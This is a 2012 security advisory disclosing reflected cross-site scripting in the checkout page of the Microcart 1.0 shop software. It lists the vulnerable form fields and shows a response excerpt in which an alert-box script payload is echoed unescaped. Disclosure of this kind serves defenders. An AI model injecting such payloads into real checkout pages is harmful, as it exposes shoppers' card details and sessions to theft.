Microcart 1.0 Checkout Cross Site Scripting

Related Vulnerabilities: CVE-2012-4241  
Publish Date: 20 Sep 2012

| Microcart 1.0 Checkout Cross-Site Scripting Security Vulnerability |


Microcart 1.0 is subject to several cross-site scripting vulnerabilities. Multiple POST parameters on the /checkout.php page were found to be subject to a cross-site scripting vulnerability. It was possible to inject arbitrary Javascript into a POST request. This code is then passed into the page content without sanitisation, and executed by the browser. The following parameters are affected:  first_name, last_name, cc, exp, cvv, address1, address2, city, state, zip, phone and email. Injecting the following Javascript code into any of the affected parameters on the /checkout.php page will trigger the vulnerability, causing the page to return a Javascript alert box.

CVE number: CVE-2012-4241
Impact: Medium
Vendor homepage: http://microcart.sourceforge.net/
Vendor notified: 23/07/2012
Vendor resonse: This package is no longer being maintained and has subsequently been removed from sourceforge.net
Credit: Chris Cooper and Joseph Sheridan of ReactionIS (http://www.reactionis.co.uk/)

This advisory is posted at:


Affected Products
======== ========

Microcart 1.0.


Multiple POST parameters on the /checkout.php page were found to be subject to a cross-site scripting vulnerability. It was possible to inject arbitrary Javascript into a POST request. This code is then passed into the page content without sanitisation, and executed by the browser. The following parameters are affected:
  first_name, last_name, cc, exp, cvv, address1, address2, city, state, zip, phone, email
Injecting the following Javascript code into any of the affected parameters on the /checkout.php page will trigger the vulnerability, causing the page to return a Javascript alert box.


Example Request:

POST /microcart/checkout.php HTTP/1.1
Cookie: PHPSESSID=2df3a1bb0sh1eka0nbte6u59e7
Content-Type: application/x-www-form-urlencoded
Content-Length: 503


Example Response:

--- SNIP ---
                     <th>First Name:</th>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <th>Last Name:</th>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <th>Credit Card Number:</th>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <th>Exp. Date (MMYY):</th>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <th>CVV2/CVC2 Number:<br />(Security code on back)</th>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <th>Street Number:</th>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <th>ZIP Code:</th>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <th>Phone Number:</th>
                     <td><span style="color:red">Invalid entry.</span> <script>alert('xsstest')</script></td>
                     <th>Email Address:</th>
                     <td><input type="hidden" name="email" value="<script>alert('xsstest')</script>" /><script>alert('xsstest')</script></td>
--- SNIP ---


An attacker might entice users to follow a malicious URL, or visit a malicious page that submits arbitrary code to a Microcart application. If they do so, Javascript code might execute in their browser, potentially stealing session cookies or downloading malware onto their machine.


The affected product is not under active development and, at the time of writing, no patch has been released by the vendor.


In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates:



Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk

Joseph Sheridan
CHECK Team Leader, CREST Infrastructure, CREST Application, CISSP
Tel: 07812052515
Web: www.reactionis.com
Email: joe@reactionis.co.uk

Reaction Information Security Limited.
Registered in England No: 6929383
Registered Office: 1, The Mews, 69 New Dover Road, Canterbury, CT1 3DZ
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